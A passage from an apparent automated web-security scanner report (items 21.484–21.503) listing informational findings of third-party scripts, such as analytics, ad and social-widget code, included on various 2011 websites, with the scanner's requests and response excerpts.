<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.484. http://whdhstore.hipcricket.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://whdhstore.hipcricket.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://uac.advertising.com/wrapper/aceUAC.js

Request

GET / HTTP/1.1
Host: whdhstore.hipcricket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 23:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"
Content-Length: 19423
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSTATBQ=FMADLDFCELMBEGBAHKIFEOLO; path=/
Cache-control: private


<style type="text/css">
/* classic styles pulled in from old template - using arial instead of TNR */
td {font-family:Arial; font-size:12px;color:#000000;}
p {font-family:Arial; font-size:12px;}
...[SNIP]...
</SCRIPT>
<SCRIPT TYPE='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></SCRIPT>
...[SNIP]...
</SCRIPT>
<SCRIPT TYPE='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></SCRIPT>
...[SNIP]...

21.485. http://wordpress.org/extend/plugins/tweetmeme-follow-button/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wordpress.org
Path:   /extend/plugins/tweetmeme-follow-button/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://edge.quantserve.com/quant.js
  • http://s.gravatar.com/js/gprofiles.js

Request

GET /extend/plugins/tweetmeme-follow-button/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 14:03:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 20241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- 37 queries, 0.175 seconds -->
<script type="text/javascript" src="http://s.gravatar.com/js/gprofiles.js"></script>
...[SNIP]...

21.486. http://wordpress.org/extend/plugins/tweetmeme/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wordpress.org
Path:   /extend/plugins/tweetmeme/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://edge.quantserve.com/quant.js
  • http://s.gravatar.com/js/gprofiles.js

Request

GET /extend/plugins/tweetmeme/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 14:03:11 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 23579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- 37 queries, 0.146 seconds -->
<script type="text/javascript" src="http://s.gravatar.com/js/gprofiles.js"></script>
...[SNIP]...

21.487. http://wordpress.org/extend/plugins/wp-pagenavi/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wordpress.org
Path:   /extend/plugins/wp-pagenavi/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://edge.quantserve.com/quant.js
  • http://s.gravatar.com/js/gprofiles.js

Request

GET /extend/plugins/wp-pagenavi/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 23:11:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 23604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- 37 queries, 0.232 seconds -->
<script type="text/javascript" src="http://s.gravatar.com/js/gprofiles.js"></script>
...[SNIP]...

21.488. http://world-cup-news.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://world-cup-news.net
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://static.fmpub.net/site/tweetmeme
  • http://thirdparty.fmpub.net/placement/329074?fleur_de_sel=2752788126]
  • http://tweetmeme.com/auth/remote?r=http%3A%2F%2Fworld-cup-news.net

Request

GET / HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:19 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=c4ce7beb6b80cbdc2e05ed76224f380c; expires=Tue, 01-Feb-2011 14:03:19 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0054788589477539
X-Served-In: 0.055518865585327
X-Served-By: h04
Content-Length: 42861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...
</script>

   <script src="http://tweetmeme.com/auth/remote?r=http%3A%2F%2Fworld-cup-news.net"></script>
...[SNIP]...
<div class="left" style="display: inline; margin: 3px 10px 0px 0px; width: 48px; height: 48px;"><script type="text/javascript" src="http://thirdparty.fmpub.net/placement/329074?fleur_de_sel=2752788126]"></script>
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.489. http://www.abbreviations.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://media.fastclick.net/w/get.media?sid=9374&m=7&tp=9&d=j&t=s
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:13:14 GMT
Connection: close
Content-Length: 35655


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
<br>
                               <script language="javascript" src="http://media.fastclick.net/w/get.media?sid=9374&m=7&tp=9&d=j&t=s"></script>
...[SNIP]...

21.490. http://www.abbreviations.com/bs2.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://uac.advertising.com/wrapper/aceUAC.js
  • http://www.google-analytics.com/urchin.js

Request

GET /bs2.aspx?st= HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:13:29 GMT
Connection: close
Content-Length: 25727


<title>What does&nbsp;&nbsp;stand for?</title>

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-positio
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...

21.491. http://www.abbreviations.com/justadded.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /justadded.aspx

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://uac.advertising.com/wrapper/aceUAC.js
  • http://www.google-analytics.com/urchin.js

Request

GET /justadded.aspx HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:12:36 GMT
Connection: close
Content-Length: 49445


<title>Just Added</title>
<meta name="description" content="Latest additions to the Abbreviations.com directory">
<base href="http://www.abbreviations.com/justadded.aspx">
<style><!--

p.specia
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...

21.492. http://www.abbreviations.com/random.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /random.aspx

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://uac.advertising.com/wrapper/aceUAC.js
  • http://www.google-analytics.com/urchin.js
  • http://www.google.com/jsapi

Request

GET /random.aspx HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:12:44 GMT
Connection: close
Content-Length: 27659


<html>

<head>
<title>What does WKSL&nbsp;stand for?</title>
<script>
<!--
var checkedStyle = "mla";
function displayCitation(format){

checkedStyle = format;
pre
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...
</tr>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.493. http://www.abbreviations.com/searchAmazon.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://uac.advertising.com/wrapper/aceUAC.js
  • http://www.google-analytics.com/urchin.js

Request

GET /searchAmazon.aspx HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:15:16 GMT
Connection: close
Content-Length: 26561

<html>

<head>
<title>Amazon Search Results</title>
<style><!--
.ctgp {padding:0px 10px 0px 0px;}
.ctgp a, .ctgp a:visited {color:#000000;}
.ctgp a:hover {color:#990000;}

.resp {padding:0px;
...[SNIP]...
<link rel="stylesheet" type="text/css" href="abbr.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</a><script " src="http://s7.addthis.com/js/250/addthis_widget.js#username=dejango"></script>
...[SNIP]...
</script>
           <script type="text/javascript"
            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

           </script>
...[SNIP]...
</script>
           <script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...

21.494. http://www.addthis.com/bookmark.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://cache.addthiscdn.com/www/q0197/js/bookmark.js

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
</style>
<script type="text/javascript" src="//cache.addthiscdn.com/www/q0197/js/bookmark.js"></script>
...[SNIP]...

21.495. http://www.adside.com/adside/advertiser.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adside.com
Path:   /adside/advertiser.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /adside/advertiser.html HTTP/1.1
Host: www.adside.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:23 GMT
ETag: W/"14556-1295025731000"
Last-Modified: Fri, 14 Jan 2011 17:22:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 14556
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>AdSide: Beyond St
...[SNIP]...
<!--[#pageholder]-->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

21.496. http://www.adside.com/adside/publisher.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adside.com
Path:   /adside/publisher.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /adside/publisher.html HTTP/1.1
Host: www.adside.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:22 GMT
ETag: W/"8990-1295025731000"
Last-Modified: Fri, 14 Jan 2011 17:22:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 8990
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>AdSide: Beyond St
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

21.497. http://www.aerotrader.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aerotrader.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.aerotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:22:55 GMT
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:22:56 GMT
Connection: close
Content-Type: text/html
Set-Cookie: TSef43b4=dda16b828fd3667079886639fd1d974f3651df908a5a2b674d3e0c18759e864aee104e3b; Path=/
Content-Length: 58457

<!-- dstolweb05-php5a --><!DOCTYPE html>
<html>
<head>
   <title>Aircraft for Sale, find used or new Cessna, Beechcraft at Aero Trader</title>
   <meta http-equiv="Cache-Control" content="no-cache" />
   <m
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.498. http://www.aerotrader.com/research/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aerotrader.com
Path:   /research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.aerotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:23:38 GMT
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 24040


<!-- dstolweb07-php5a -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Airplane Resources: Airplane Loans, Airplane Insurance, Real Estate, and More - AeroTra
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.499. http://www.aerotrader.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aerotrader.com
Path:   /sell/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js
  • http://server.iad.liveperson.net/hc/13223596/x.js?cmd=file&file=chatScript3&site=13223596&&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a

Request

GET /sell/ HTTP/1.1
Host: www.aerotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:23:15 GMT
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 31681


<!-- dstolweb02-php5a -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell Your New or Used Aircraft, Real Estate or Trade - AeroTrader.com</title>
   <meta na
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG -->
<script language='javascript' src='http://server.iad.liveperson.net/hc/13223596/x.js?cmd=file&file=chatScript3&site=13223596&&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a'> </script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.500. http://www.alistapart.com/articles/alternate/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alistapart.com
Path:   /articles/alternate/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.37signals.com/svn/job.fcgi

Request

GET /articles/alternate/ HTTP/1.1
Host: www.alistapart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: mobify=0; expires=Mon, 24-Jan-2011 18:03:24 GMT; path=/; domain=.alistapart.com
Set-Cookie: exp_last_visit=980553804; expires=Tue, 24-Jan-2012 16:03:24 GMT; path=/
Set-Cookie: exp_last_activity=1295913804; expires=Tue, 24-Jan-2012 16:03:24 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A20%3A%22%2Farticles%2Falternate%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:03:24 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <title>A List Ap
...[SNIP]...
</h4>
   <script src="http://www.37signals.com/svn/job.fcgi" type="text/javascript"></script>
...[SNIP]...

21.501. http://www.amazon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js

Request

GET / HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:22 GMT
Server: Server
Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Tue, 25-Jan-2011 14:04:22 GMT
x-amz-id-1: 0SBFNHA40PDAQCKXW60Q
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: qBgIWFuA2Wjoamon8NoAG9bdAoR3KqlibGyFaWE7CQvIKyPWqQkJunDX652P1Cp2
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-0141411-2666057; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 141800


<html>
<head>


<style type="text/css"><!--


BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FF
...[SNIP]...
</script>

<script type="text/javascript" src="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js"></script>
...[SNIP]...

21.502. http://www.amazon.com/b/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /b/

Issue detail

The response dynamically includes the following script from another domain:
  • http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js

Request

GET /b/?ie=UTF8&node=507846&tag=amazusnavi-20&ref=pd_sl_24x92mgoc0_b/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:36 GMT
Server: Server
x-amz-id-1: 1RQGNQ6WM7Y4MS66G38B
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: +r+poGKg+6bD50on5oekljcjzy+nvcyzjWwpkxQMpxCaWBoeQj7sCKT1NNVYKm6p
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-7332499-5529366; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 135637


<html>
<head>


<style type="text/css"><!--


BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FF
...[SNIP]...
</script>

<script type="text/javascript" src="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js"></script>
...[SNIP]...

21.503. http://www.amazon.com/gp/site-directory/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /gp/site-directory/x22

Issue detail

The response dynamically includes the following script from another domain:
  • http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js

Request

GET /gp/site-directory/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
